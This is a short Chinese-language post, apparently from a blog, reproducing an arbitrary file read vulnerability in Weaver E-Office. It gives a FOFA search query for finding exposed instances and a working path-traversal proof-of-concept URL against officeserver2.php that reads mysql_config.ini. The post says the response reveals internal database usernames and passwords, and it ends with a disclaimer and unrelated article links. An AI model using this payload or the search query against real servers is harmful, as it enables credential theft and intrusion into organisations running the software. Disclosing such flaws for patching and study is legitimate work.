E-Office(泛微OA)前台任意文件读取漏洞复现

简介

泛微E-Office是一款企业级的全流程办公自动化软件,它包括协同办公、文档管理、知识管理、工作流管理等多个模块,涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。

officeserver.php文件存在任意文件读取漏洞,通过漏洞可以下载服务器上的任意文件。

漏洞复现

FOFA语法:

app="泛微-EOffice" && icon_hash="1578525679"

访问后页面如下:

POC:

/iweboffice/officeserver2.php?OPTION=LOADTEMPLATE&COMMAND=INSERTFILE&TEMPLATE=../../bin/mysql_config.ini

响应返回页面获取到内网区域数据库用户名和密码

免责声明

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!


结语

没有人规定,一朵花一定要成长为向日葵或者玫瑰。

相关推荐
网安小白的进阶之路2 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-2
网络·安全·web安全·系统安全·交换机
安全系统学习2 小时前
网络安全之RCE分析与利用详情
服务器·网络·安全·web安全·系统安全
武汉唯众智创2 小时前
网络安全实训室建设方案全攻略
网络·安全·web安全·网络安全·网络安全实训室·网络安全实验室
weixin_472339462 小时前
网络安全攻防:文件上传漏洞的深度解析与防御实践
安全·web安全
雪兽软件2 小时前
2025 年网络安全与人工智能发展趋势
人工智能·安全·web安全
小黄人20254 小时前
自动驾驶安全技术的演进与NVIDIA的创新实践
人工智能·安全·自动驾驶
CS创新实验室4 小时前
筑牢 AIGC 安全防线:警惕提示词注入攻击
安全·大模型·aigc·提示词·提示词注入
宝山哥哥5 小时前
网络信息安全学习笔记1----------网络信息安全概述
网络·笔记·学习·安全·网络安全
电池保护板测试仪厂家7 小时前
电池充放电容量检测:守护电动出行设备动力核心的安全防线
科技·安全·能源·制造·零售·交通物流
深盾科技9 小时前
.NET 安全之 JIT 保护技术深度解析
安全·.net